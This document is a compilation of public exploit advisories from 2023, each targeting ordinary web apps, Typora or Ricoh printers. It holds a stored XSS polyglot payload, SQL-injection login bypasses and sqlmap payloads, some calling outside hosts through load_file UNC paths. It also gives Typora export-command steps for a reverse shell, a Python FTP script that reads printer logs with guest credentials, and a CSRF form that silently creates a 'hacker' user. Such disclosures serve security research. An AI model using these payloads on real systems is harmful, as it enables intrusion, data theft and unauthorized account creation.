# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS # Application: Blood Donor Management System # Version: v2.2 # Bugs: Stored XSS # Technology: PHP # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/ # Date: 12.09.2023 # Author: SoSPiro # Tested on: Windows #POC ======================================== 1. Login to admin account 2. Go to /admin/update-contactinfo.php 3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload. 4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

# Exploit Title: Bank Locker Management System - SQL Injection # Application: Bank Locker Management System # Date: 12.09.2023 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ # Tested on: Windows 10 64 bit Wampserver ## Description: This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application. ## Vulnerability Details: - **Application Name**: Bank Locker Management System - **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/) - **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/) ## Vulnerability Description: The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields: Payload: admin' or '1'='1-- - An attacker can gain unauthorized access to the application with administrative privileges. ## Proof of Concept (PoC): 1. Visit the application locally at http://blms.local (assuming it's hosted on localhost). 2. Navigate to the "banker" directory: http://blms.local/banker/ 3. In the login and password fields, input the following payload: 4. admin' or '1'='1-- -

# Exploit Title: Typora v1.7.4 - OS Command Injection # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 13.09.2023 # Vendor Homepage: http://www.typora.io # Software Link: https://download.typora.io/windows/typora-setup-ia32.exe # Tested Version: v1.7.4 (latest) # Tested on: Windows 2019 Server 64bit # # # Steps to Reproduce # # # # Open the application # Click on Preferences from the File menu # Select PDF from the Export tab # Check the “run command” at the bottom right and enter your reverse shell command into the opened box # Close the page and go back to the File menu # Then select PDF from the Export tab and click Save # Reverse shell is ready!

## Title: Fundraising Script-1.0 SQLi ## Author: nu11secur1ty ## Date: 09/13/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `cid` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cid parameter, and a database error message was returned. The database is empty, but if it is not, this will be over for the money of the donors and their bank accounts! The attacker can steal all information from the database! [+]Payload: mysql Parameter: cid (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT (ELT(1741=1741,1))),0x7162787171),3873)) https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0 System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>

## Title: PHP Shopping Cart-4.2 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/13/2023 ## Vendor: https://www.phpjabbers.com/ ## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `id` parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker easily can steal all information from the database of this web application! WARNING! All of you: Be careful what you buy! This will be your responsibility! [+]Payload: mysql Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT 3795=3795-- sRcp&session_id= Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT (ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id= ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2 ## Proof and Exploit: https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>

#Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023 #Exploit Author: Thomas Heverin (Heverin Hacker) #Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers #Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py #Version: Ricoh Printers - All Versions #Tested on: Windows #CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log) from ftplib import FTP def ftp_connect(ip): try: ftp = FTP(ip) ftp.login("guest", "guest") print(f"Connected to {ip} over FTP as 'guest'") return ftp except Exception as e: print(f"Failed to connect to {ip} over FTP: {e}") return None if __name__ == "__main__": target_ip = input("Enter the Ricoh Printer IP address: ") ftp_connection = ftp_connect(target_ip) if ftp_connection: try: while True: file_list = ftp_connection.nlst() print("List of Ricoh printer files and directories:") for index, item in enumerate(file_list, start=1): print(f"{index}. {item}") file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1 if file_index < 0: break if 0 <= file_index < len(file_list): selected_file = file_list[file_index] lines = [] ftp_connection.retrlines("RETR " + selected_file, lines.append) print(f"Contents of '{selected_file}':") for line in lines: print(line) else: print("Invalid file index.") except Exception as e: print(f"Failed to perform operation: {e}") finally: ftp_connection.quit()

# Exploit Title: Academy LMS 6.2 - SQL Injection # Exploit Author: CraCkEr # Date: 29/08/2023 # Vendor: Creativeitem # Vendor Homepage: https://creativeitem.com/ # Software Link: https://demo.creativeitem.com/academy/ # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-4974 # CWE: CWE-89 / CWE-74 / CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /academy/tutor/filter GET parameter 'price_min' is vulnerable to SQL Injection GET parameter 'price_max' is vulnerable to SQL Injection https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0 --- Parameter: price_min (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 Parameter: price_max (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0 --- [-] Done

## Title: 101 News-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/16/2023 ## Vendor: https://mayurik.com/ ## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The searchtitle parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' was submitted in the searchtitle parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. [+]Payload: ```mysql --- Parameter: searchtitle (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: searchtitle=814271'+(select load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL# ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0 ## Proof and Exploit: https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html System Administrator - Infrastructure Engineer Penetration Testing Engineer nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability # Application: Grocy # Version: <= 4.0.2 # Date: 09/21/2023 # Exploit Author: Chance Proctor # Vendor Homepage: https://grocy.info/ # Software Link: https://github.com/grocy/grocy # Tested on: Linux # CVE : CVE-2023-42270 Overview ================================================== When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting. This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from. This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions. Proof of Concept ================================================== Host the following html code via a XSS or delivery via a phishing campaign: <html> <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded"> <input name='username' value='hacker' type='hidden'> <input name='password' value='test' type='hidden'> <input type=submit> </form> <script> history.pushState('','', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials Username: hacker Password: test Note: In order for this to work, the target must have Create User Permissions. This is enabled by default. Proof of Exploit/Reproduce ================================================== http://xploit.sh/posts/cve-2023-42270/